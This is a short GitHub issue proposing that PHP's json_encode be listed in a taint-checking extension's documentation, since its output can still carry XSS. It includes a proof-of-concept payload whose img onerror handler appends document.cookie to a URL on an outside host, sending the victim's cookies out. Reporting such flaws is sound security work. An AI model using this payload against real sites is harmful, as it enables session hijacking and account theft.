Open gouchaoer opened 8 years ago
http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653
A poc to steal cookie:
$xss=<<<EOL <img id='id' src='http://balabla.com/xss.php?'> <img src=# onerror=document.getElementById('id').src+=document.cookie> EOL; $arr['xss']=$xss; echo json_encode($arr);
Actually json_encode is widly used to escape js. I suggest add json_encode to http://php.net/manual/en/taint.detail.basic.php
http://php.net/manual/en/taint.detail.basic.php
http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653A poc to steal cookie:
Actually json_encode is widly used to escape js. I suggest add json_encode to
http://php.net/manual/en/taint.detail.basic.php